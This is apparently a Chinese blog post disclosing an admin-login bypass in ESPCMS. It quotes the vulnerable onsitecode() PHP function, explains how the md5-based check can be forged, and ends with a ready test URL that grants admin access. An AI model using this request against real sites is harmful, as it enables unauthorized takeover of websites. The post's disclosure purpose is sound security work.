ESPCMS 后台登陆绕过bug

时隔好久,童鞋相继发过这个CMS漏洞,今天大体看了下,问题还有,官方还是一直在修复漏洞。 问题出在后台文件adminsoft\control\adminuser.php文件 代码问题出在函数onsitecode() [php] function onsitecode() { parent::start_template(); $db_table = db_prefix . "admin_member"; $linkURL = $_SERVER['HTTP_REFERER']; $siteid = $this->fun->accept('siteid', 'R'); $code = $this->fun->accept('code', 'R'); $adminid = $this->fun->accept('adminid', 'R'); $siteip = $this->fun->real_server_ip(); //echo $adminid; if (empty($siteid) || empty($code) || empty($siteip) || empty($this->CON['sitecoedb']) || empty($adminid)) { exit(); } $codelist = md5($this->CON['sitecoedb'] . '_' . $siteip . '_' . adminfile); if ($code == $codelist) { $db_where = "username='$adminid' AND isclass=1 AND isremote=1"; $rsMember = $this->db->fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where); if (!$rsMember) { exit('ESPCMS:Parameter error!'); } else { $ipadd = $this->fun->ip($_SERVER['REMOTE_ADDR']); $date = time(); $db_set = "intime=$date,ipadd=$ipadd,hit=hit+1"; $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where); $db_table = db_prefix . 'admin_powergroup'; $db_where = 'id=' . $rsMember['powergroup']; $rsPower = $this->db->fetch_first('SELECT powername,powerlist FROM ' . $db_table . ' WHERE ' . $db_where); if ($rsPower['powerlist'] != 'all') { $rsPower_array = explode('|', $rsPower['powerlist']); $rsPower_array = is_array($rsPower_array) ? $this->fun->exp_array($rsPower_array) : $rsPower_array; $sysArray = $this->get_powermenulist('all'); $sys_newsArray = array(); foreach ($sysArray as $key => $value) { $sys_newsArray[] = $value['loadfun']; } $sys_newsArray = $this->fun->exp_array($sys_newsArray); $diff_array = array_diff($sys_newsArray, $rsPower_array); $rsPower['powerlist'] = implode('|', $diff_array); } $this->fun->setcookie("esp_powerlist", $this->fun->eccode($rsPower['powerlist'], 'ENCODE', db_pscode)); $this->fun->setcookie('ecisp_admininfo', $this->fun->eccode("$rsMember[id]|$rsMember[username]|$rsMember[password]|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . $rsMember[powergroup] . '|' . $rsMember[inputclassid] . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode)); $this->writelog($this->lng['adminuser_login_log_action'], $this->lng['log_extra_ok'] . ' user=' . $rsMember['username'], $rsMember['username']); header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter'); exit('true'); } } exit(); }[/php] 只要$code == $codelist就通过验证,那么我们可以自己构造,主要就是 $codelist = md5($this->CON['sitecoedb'] . ‘_’ . $siteip . ‘_’ . adminfile); 测试代码如下 index.php?archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea 直接访问登录后台。

发表评论